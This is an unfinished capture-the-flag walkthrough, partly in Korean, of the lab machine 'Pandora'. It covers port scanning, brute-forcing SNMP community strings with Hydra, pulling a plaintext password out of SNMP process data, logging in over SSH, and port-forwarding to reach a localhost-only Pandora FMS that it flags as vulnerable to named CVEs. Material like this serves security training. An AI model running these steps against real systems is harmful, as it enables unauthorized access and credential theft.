Proof of Concept
10.129.2.223
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
161/udp open snmpInitial Access
80 포트 웹서비스 접근 후 Footer에서 도메인 정보 발견
- Panda.HTB
/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.2.223 pandora.htbFound SNMP Community String using hydra
- public
┌──(kali㉿kali)-[~/Pandora]
└─$ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://10.129.2.223
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-19 10:45:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://10.129.2.223:161/
[161][snmp] host: 10.129.2.223 password: public
[STATUS] attack finished for 10.129.2.223 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-19 10:45:34Enumerated SNMP data
┌──(kali㉿kali)-[~/Pandora]
└─$ snmpbulkwalk -v2c -c public 10.129.2.223 | tee snmpwalk.txt
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
<SNIP>Found suer Daniel in SNMP data
┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 10 -B 10 -i pandora
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4Found Daniel’s credentials in SNMP data
- daniel:HotelBabylon23
┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 5 -B 5 -i daniel
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
--
iso.3.6.1.2.1.25.4.2.1.5.898 = ""
iso.3.6.1.2.1.25.4.2.1.5.961 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.971 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.972 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.973 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.975 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.977 = ""
iso.3.6.1.2.1.25.4.2.1.5.990 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1039 = ""
iso.3.6.1.2.1.25.4.2.1.5.1040 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1144 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1347 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1598 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1791 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1822 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1831 = STRING: "-k start"Authenticated to SSH service using Daniel’s credentials
┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh daniel@pandora.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 19 Feb 16:18:31 UTC 2026
System load: 0.0
Usage of /: 63.0% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 234
Users logged in: 0
IPv4 address for eth0: 10.129.2.223
IPv6 address for eth0: dead:beef::250:56ff:feb0:6938
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$Lateral Movement (Auth as matt)
/etc/apache2/sites-enabled/pandora.conf 파일 확인 결과, Localhost에서만 접속 가능한 웹서비스 발견
daniel@pandora:/etc/apache2$ cat ./sites-enabled/pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>/etc/hosts 파일 설정
┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.2.223 pandora.htb pandora.panda.htbSSH 포트포워딩 설정
┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh -f -N -L 8888:127.0.0.1:80 daniel@10.129.2.223
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
┌──(kali㉿kali)-[~/Pandora]
└─$ ss -nltp | grep 8888
LISTEN 0 128 127.0.0.1:8888 0.0.0.0:* users:(("ssh",pid=617053,fd=5))
LISTEN 0 128 [::1]:8888 [::]:* users:(("ssh",pid=617053,fd=4))http://localhost:8888로 접속 시 Pandora FMS v7.0NG.742_FIX_PERL2020 서비스가 동작중인 것을 확인
- Pandora FMS v7.0NG.742_FIX_PERL2020
해당 버전에서 RCE 취약점 발견 (CVE-2020-5844)
Note_tmp
Vulnerable to CVE-2021-3560
╔══════════╣ PGP Keys and Related Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys
GPG:
GPG is installed, listing keys:
-e
NetPGP:
netpgpkeys Not Found
-e
PGP Related Files:
Found: /home/daniel/.gnupg
total 16
drwx------ 2 daniel daniel 4096 Feb 19 16:25 .
drwxr-xr-x 5 daniel daniel 4096 Feb 19 16:25 ..
-rw------- 1 daniel daniel 32 Feb 19 16:25 pubring.kbx
-rw------- 1 daniel daniel 1200 Feb 19 16:25 trustdb.gpg
╔══════════╣ Analyzing MariaDB Files (limit 70)
-rw-r--r-- 1 root root 911 Dec 3 2021 /etc/mysql/mariadb.cnf
[mysqld]
sql_mode=NO_ENGINE_SUBSTITUTION
[client-server]
!includedir /etc/mysql/conf.d/
!includedir /etc/mysql/mariadb.conf.d/
-rw------- 1 root root 261 Jun 11 2021 /etc/mysql/debian.cnf
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Jan 3 2022 /var/backups
total 916
-rw-r--r-- 1 root root 51200 Dec 7 2021 alternatives.tar.0
-rw-r--r-- 1 root root 41519 Jan 3 2022 apt.extended_states.0
-rw-r--r-- 1 root root 4495 Nov 23 2021 apt.extended_states.1.gz
-rw-r--r-- 1 root root 4703 Jun 11 2021 apt.extended_states.2.gz
-rw-r--r-- 1 root root 4733 Jun 11 2021 apt.extended_states.3.gz
-rw-r--r-- 1 root root 268 Jun 11 2021 dpkg.diversions.0
-rw-r--r-- 1 root root 172 Jun 11 2021 dpkg.statoverride.0
-rw-r--r-- 1 root root 804382 Nov 23 2021 dpkg.status.0
drwxr-xr-x 2 root root 4096 Dec 7 2021 /var/cache/dbconfig-common/backups
total 0
daniel@pandora:/etc/apache2$ grep -iR passw .
./sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
./sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
./apache2.conf:# The following lines prevent .htaccess and .htpasswd files from being